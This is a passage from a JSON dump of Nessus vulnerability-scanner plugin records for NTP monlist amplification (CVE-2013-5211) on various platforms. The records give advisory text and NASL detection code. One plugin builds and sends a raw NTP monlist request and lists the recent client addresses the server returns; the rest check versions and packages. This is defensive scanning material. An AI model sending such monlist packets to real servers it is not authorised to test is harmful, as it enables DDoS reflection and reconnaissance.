However, it is affected by a denial of\nservice vulnerability in ntp_request.c that allows an unauthenticated,\nremote attacker to saturate network traffic to a specific IP address\nby using forged REQ_MON_GETLIST or REQ_MON_GETLIST_1 requests.\nFurthermore, an attacker can exploit this issue to conduct\nreconnaissance or distributed denial of service (DDoS) attacks.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://isc.sans.edu/diary/NTP+reflection+attack/17300\");\n script_set_attribute(attribute:\"see_also\", value:\"http://bugs.ntp.org/show_bug.cgi?id=1532\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10613\");\n script_set_attribute(attribute:\"solution\", value:\n\"If using NTP from the Network Time Protocol Project, upgrade to\nNTP version 4.2.7-p26 or later. Alternatively, add 'disable monitor'\nto the ntp.conf configuration file and restart the service. Otherwise,\nlimit access to the affected service to trusted hosts, or contact the\nvendor for a fix.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/04/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ntp:ntp\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ntp_open.nasl\");\n script_require_keys(\"NTP/Running\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Make sure NTP server is running\nget_kb_item_or_exit('NTP/Running');\n\nport = get_service(svc:\"ntp\", ipproto:\"udp\", default:123, exit_on_fail:TRUE);\n\nsoc = open_sock_udp(port);\nif (!soc) audit(AUDIT_SOCK_FAIL, port, \"UDP\");\n\nreq = raw_string(0x17, 0, 0x03, 0x2a, 0, 0, 0, 0);\nreq += mkpad(40);\nsend(socket:soc, data:req);\nres = recv(socket:soc, length:508);\nclose(soc);\n\nif (isnull(res)) audit(AUDIT_RESP_NOT, port, \"an NTP 'monlist' command\", \"UDP\");\n\nif (strlen(res) < 8) audit(AUDIT_RESP_BAD, port, \"an NTP 'monlist' command\", \"UDP\");\n\nimpl = ord(res[2]);\ncode = ord(res[3]);\n\ncount = getword(blob:res, pos:4);\nsize = getword(blob:res, pos:6);\n\nif (size == 0) audit(AUDIT_LISTEN_NOT_VULN, \"NTP\", port+\" UDP\");\n\nif ((impl != 2 && impl != 3) || code != 42 || size != 72) audit(AUDIT_RESP_BAD, port, \"an NTP 'monlist' command\", \"UDP\");\n\n\nif (report_verbosity > 0)\n{\n off = 8;\n ips = \"\";\n\n for (i = 0; i < count; i++)\n {\n src = ord(res[off+16]) + \".\" + ord(res[off+17]) + \".\" + ord(res[off+18]) + \".\" + ord(res[off+19]);\n ips += src + '\\n';\n off += size;\n }\n\n report = '\\n' + 'Nessus was able to retrieve the following list of recent hosts to' +\n '\\n' + 'connect to this NTP server :' +\n '\\n' +\n '\\n' + ips;\n security_warning(port:port, protocol:\"udp\", extra:report);\n}\nelse security_warning(port:port, protocol:\"udp\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:09:27", "description": "The remote VMware ESXi host is version 5.0 prior to build 1749766. 
It is, therefore, affected by multiple vulnerabilities :\n\n - A flaw exists in the monlist feature in NTP. A remote attacker can exploit this flaw, using a specially crafted packet to load the query function in monlist, to conduct a distributed denial of service attack.\n (CVE-2013-5211)\n\n - An unspecified privilege escalation vulnerability exists that allows an attacker to gain host OS privileges or cause a denial of service condition by modifying a configuration file. (CVE-2014-8370)", "cvss3": {}, "published": "2015-01-29T00:00:00", "type": "nessus", "title": "ESXi 5.0 < Build 1749766 Multiple Vulnerabilities (remote check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2014-8370"], "modified": "2019-09-24T00:00:00", "cpe": ["cpe:/o:vmware:esxi", "cpe:/a:ntp:ntp"], "id": "VMWARE_ESXI_5_0_BUILD_1749766_REMOTE.NASL", "href": "https://www.tenable.com/plugins/nessus/81083", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81083);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/09/24 15:02:54\");\n\n script_cve_id(\"CVE-2013-5211\", \"CVE-2014-8370\");\n script_bugtraq_id(64692, 72338);\n script_xref(name:\"CERT\", value:\"348126\");\n script_xref(name:\"VMSA\", value:\"2014-0002\");\n script_xref(name:\"VMSA\", value:\"2015-0001\");\n\n script_name(english:\"ESXi 5.0 < Build 1749766 Multiple Vulnerabilities (remote check)\");\n script_summary(english:\"Checks the ESXi version and build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote VMware ESXi 5.0 host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote VMware ESXi host is version 5.0 prior to build 1749766. It\nis, therefore, affected by multiple vulnerabilities :\n\n - A flaw exists in the monlist feature in NTP. 
A remote\n attacker can exploit this flaw, using a specially\n crafted packet to load the query function in monlist, to\n conduct a distributed denial of service attack.\n (CVE-2013-5211)\n\n - An unspecified privilege escalation vulnerability exists\n that allows an attacker to gain host OS privileges or\n cause a denial of service condition by modifying a\n configuration file. (CVE-2014-8370)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2014-0002.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2015-0001.html\");\n # https://kb.vmware.com/selfservice/microsites/search.do?cmd=displayKC&externalId=2075521\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3054e515\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply patch ESXi500-201405001 for ESXi 5.0.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/04/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ntp:ntp\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vsphere_detect.nbin\");\n script_require_keys(\"Host/VMware/version\", \"Host/VMware/release\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nver = get_kb_item_or_exit(\"Host/VMware/version\");\nrel = get_kb_item_or_exit(\"Host/VMware/release\");\n\nif (\"ESXi\" >!< rel) audit(AUDIT_OS_NOT, \"ESXi\");\nif (\"VMware ESXi 5.0\" >!< rel) audit(AUDIT_OS_NOT, \"ESXi 5.0\");\n\nmatch = eregmatch(pattern:'^VMware ESXi.*build-([0-9]+)$', string:rel);\nif (isnull(match)) exit(1, 'Failed to extract the ESXi build number.');\n\nbuild = int(match[1]);\nfixed_build = 1749766;\n\nif (build < fixed_build)\n{\n if (report_verbosity > 0)\n {\n report = '\\n ESXi version : ' + ver +\n '\\n Installed build : ' + build +\n '\\n Fixed build : ' + fixed_build +\n '\\n';\n security_warning(port:0, extra:report);\n }\n else security_warning(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"VMware ESXi\", ver - \"ESXi \" + \" build \" + build);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:27:08", "description": "The version of Junos OS installed on the remote host is affected by multiple vulnerabilities as referenced in the JSA11171 advisory.\n\n - The control mode (mode 6) functionality in ntpd in NTP before 4.2.8p9 allows remote attackers to set or unset traps via a crafted control mode packet. (CVE-2016-9310)\n\n - The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013. 
(CVE-2013-5211)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-04-15T00:00:00", "type": "nessus", "title": "Juniper Junos OS Multiple Vulnerabilities (JSA11171)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2016-9310"], "modified": "2021-04-19T00:00:00", "cpe": ["cpe:/o:juniper:junos"], "id": "JUNIPER_JSA11171.NASL", "href": "https://www.tenable.com/plugins/nessus/148645", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148645);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/04/19\");\n\n script_cve_id(\"CVE-2013-5211\", \"CVE-2016-9310\");\n script_xref(name:\"JSA\", value:\"JSA11171\");\n\n script_name(english:\"Juniper Junos OS Multiple Vulnerabilities (JSA11171)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Junos OS installed on the remote host is affected by multiple vulnerabilities as referenced in the\nJSA11171 advisory.\n\n - The control mode (mode 6) functionality in ntpd in NTP before 4.2.8p9 allows remote attackers to set or\n unset traps via a crafted control mode packet. (CVE-2016-9310)\n\n - The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a\n denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1\n requests, as exploited in the wild in December 2013. 
(CVE-2013-5211)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/JSA11171\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant Junos software release referenced in Juniper advisory JSA11171\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-9310\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/12/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:juniper:junos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Junos Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"junos_version.nasl\");\n script_require_keys(\"Host/Juniper/JUNOS/Version\", \"Host/Juniper/model\");\n\n exit(0);\n}\n\ninclude('junos.inc');\n\nmodel = get_kb_item_or_exit('Host/Juniper/model');\nif (model !~ \"^(EX|SRX)\")\n{\n audit(AUDIT_DEVICE_NOT_VULN, model);\n}\n\nver = get_kb_item_or_exit('Host/Juniper/JUNOS/Version');\n\nvuln_ranges = [\n {'min_ver':'14.1X53', 'fixed_ver':'14.1X53-D53'},\n {'min_ver':'16.1', 'fixed_ver':'16.1R7-S6'},\n {'min_ver':'16.2', 'fixed_ver':'16.2R3'},\n {'min_ver':'17.1', 'fixed_ver':'17.1R2-S11'},\n {'min_ver':'17.2', 'fixed_ver':'17.2R1-S9'},\n {'min_ver':'17.3', 'fixed_ver':'17.3R2-S5'},\n {'min_ver':'17.4', 'fixed_ver':'17.4R2-S7'},\n {'min_ver':'18.1', 'fixed_ver':'18.1R3-S8'},\n {'min_ver':'18.2', 'fixed_ver':'18.2R2-S7'},\n {'min_ver':'18.3', 'fixed_ver':'18.3R1-S5'},\n {'min_ver':'18.4', 'fixed_ver':'18.4R1-S4'},\n {'min_ver':'19.1', 'fixed_ver':'19.1R1-S3'},\n {'min_ver':'19.2', 'fixed_ver':'19.2R1-S1'}\n];\nif (model =~ '^EX')\n{\n append_element(var:vuln_ranges, value:{'min_ver':'12.3', 'fixed_ver':'12.3R12-S15'});\n append_element(var:vuln_ranges, value:{'min_ver':'15.1', 'fixed_ver':'15.1R7-S6'});\n}\nif (model =~ '^SRX')\n{\n append_element(var:vuln_ranges, value:{'min_ver':'12.3X48', 'fixed_ver':'12.3X48-D95'});\n append_element(var:vuln_ranges, value:{'min_ver':'15.1X49', 'fixed_ver':'15.1X49-D190'});\n}\n\nfix = junos_compare_range(target_version:ver, vuln_ranges:vuln_ranges);\nif (empty_or_null(fix)) audit(AUDIT_INST_VER_NOT_VULN, 'Junos OS', ver);\nreport = get_report(ver:ver, fix:fix);\nsecurity_report_v4(severity:SECURITY_WARNING, port:0, extra:report);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:35", "description": "The remote VMware ESX / ESXi host is affected by multiple vulnerabilities :\n\n - Multiple integer overflow conditions exist in the glibc package in file malloc/malloc.c. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-10-21T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 3.0.2.2 : ntp (EulerOS-SA-2020-2225)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2016-7427", "CVE-2016-7428"], "modified": "2022-05-11T00:00:00", "cpe": ["cpe:/o:huawei:euleros:uvp:3.0.2.2", "p-cpe:/a:huawei:euleros:ntp", "p-cpe:/a:huawei:euleros:ntpdate"], "id": "EULEROS_SA-2020-2225.NASL", "href": "https://www.tenable.com/plugins/nessus/141678", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141678);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/11\");\n\n script_cve_id(\"CVE-2013-5211\", \"CVE-2016-7427\", \"CVE-2016-7428\");\n script_bugtraq_id(64692);\n\n script_name(english:\"EulerOS Virtualization 3.0.2.2 : ntp (EulerOS-SA-2020-2225)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ntp packages installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerabilities :\n\n - The monlist feature in ntp_request.c in ntpd in NTP\n before 4.2.7p26 allows remote attackers to cause a\n denial of service (traffic amplification) via forged\n (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests,\n as exploited in the wild in December\n 2013.(CVE-2013-5211)\n\n - The broadcast mode replay prevention functionality in\n ntpd in NTP before 4.2.8p9 allows remote attackers to\n cause a denial of service (reject broadcast mode\n packets) via a crafted broadcast mode\n packet.(CVE-2016-7427)\n\n - ntpd in 
NTP before 4.2.8p9 allows remote attackers to\n cause a denial of service (reject broadcast mode\n packets) via the poll interval in a broadcast\n packet.(CVE-2016-7428)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-2225\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b45ced1b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ntp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-5211\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2016-7428\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ntpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.2.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei 
Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.2.2\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.2.2\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"ntp-4.2.6p5-28.h15.eulerosv2r7\",\n \"ntpdate-4.2.6p5-28.h15.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:01", "description": "According to its self-reported version number, the remote pfSense install is prior to 2.1.1. 
It is, therefore, affected by multiple vulnerabilities as stated in the referenced vendor advisories.", "cvss3": {}, "published": "2018-01-31T00:00:00", "type": "nessus", "title": "pfSense < 2.1.1 Multiple Vulnerabilities (SA-14_02 / SA-14_03)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4353", "CVE-2013-5211", "CVE-2013-6449", "CVE-2013-6450", "CVE-2014-1452"], "modified": "2019-11-08T00:00:00", "cpe": ["cpe:/a:pfsense:pfsense", "cpe:/a:bsdperimeter:pfsense"], "id": "PFSENSE_SA-14_03.NASL", "href": "https://www.tenable.com/plugins/nessus/106488", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106488);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\n \"CVE-2013-4353\",\n \"CVE-2013-5211\",\n \"CVE-2013-6449\",\n \"CVE-2013-6450\",\n \"CVE-2014-1452\"\n );\n script_bugtraq_id(\n 64530,\n 64618,\n 64691,\n 64692,\n 64967\n );\n script_xref(name:\"FreeBSD\", value:\"SA-14:01.bsnmpd\");\n script_xref(name:\"FreeBSD\", value:\"SA-14:02.ntpd\");\n script_xref(name:\"FreeBSD\", value:\"SA-14:03.openssl\");\n\n script_name(english:\"pfSense < 2.1.1 Multiple Vulnerabilities (SA-14_02 / SA-14_03)\");\n script_summary(english:\"Checks the version of pfSense.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote firewall host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the remote pfSense\ninstall is prior to 2.1.1. 
It is, therefore, affected by multiple\nvulnerabilities as stated in the referenced vendor advisories.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://doc.pfsense.org/index.php/2.1.1_New_Features_and_Changes\");\n # https://www.pfsense.org/security/advisories/pfSense-SA-14_02.webgui.asc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?df2891d0\");\n # https://www.pfsense.org/security/advisories/pfSense-SA-14_03.webgui.asc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?780104d5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to pfSense version 2.1.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-1452\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pfsense:pfsense\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:bsdperimeter:pfsense\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"pfsense_detect.nbin\");\n script_require_keys(\"Host/pfSense\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"vcf_extras.inc\");\n\nif (!get_kb_item(\"Host/pfSense\")) audit(AUDIT_HOST_NOT, \"pfSense\");\n\napp_info = vcf::pfsense::get_app_info();\nconstraints = [\n { \"fixed_version\" : \"2.1.1\" }\n];\n\nvcf::pfsense::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_WARNING,\n flags:{xss:TRUE}\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:09:01", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - add disable monitor to default ntp.conf [CVE-2013-5211]\n\n - don't limit rate of packets from sources (CVE-2016-7426)\n\n - don't change interface from received packets (CVE-2016-7429)\n\n - fix calculation of root distance again (CVE-2016-7433)\n\n - require authentication for trap commands (CVE-2016-9310)\n\n - fix crash when reporting peer event to trappers (CVE-2016-9311)", "cvss3": {}, "published": "2017-02-08T00:00:00", "type": "nessus", "title": "OracleVM 3.3 / 3.4 : ntp (OVMSA-2017-0038)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2016-7426", "CVE-2016-7429", "CVE-2016-7433", "CVE-2016-9310", "CVE-2016-9311"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:ntp", "p-cpe:/a:oracle:vm:ntpdate", "cpe:/o:oracle:vm_server:3.3", "cpe:/o:oracle:vm_server:3.4"], "id": "ORACLEVM_OVMSA-2017-0038.NASL", "href": "https://www.tenable.com/plugins/nessus/97058", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2017-0038.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97058);\n script_version(\"3.10\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2013-5211\", \"CVE-2016-7426\", \"CVE-2016-7429\", \"CVE-2016-7433\", \"CVE-2016-9310\", \"CVE-2016-9311\");\n script_bugtraq_id(64692);\n\n script_name(english:\"OracleVM 3.3 / 3.4 : ntp (OVMSA-2017-0038)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - add disable monitor to default ntp.conf [CVE-2013-5211]\n\n - don't limit rate of packets from sources (CVE-2016-7426)\n\n - don't change interface from received packets\n (CVE-2016-7429)\n\n - fix calculation of root distance again (CVE-2016-7433)\n\n - require authentication for trap commands (CVE-2016-9310)\n\n - fix crash when reporting peer event to trappers\n (CVE-2016-9311)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-February/000645.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?798cb9e7\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-February/000646.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3c07bfe5\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected ntp / ntpdate packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", 
value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:ntpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/02/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n 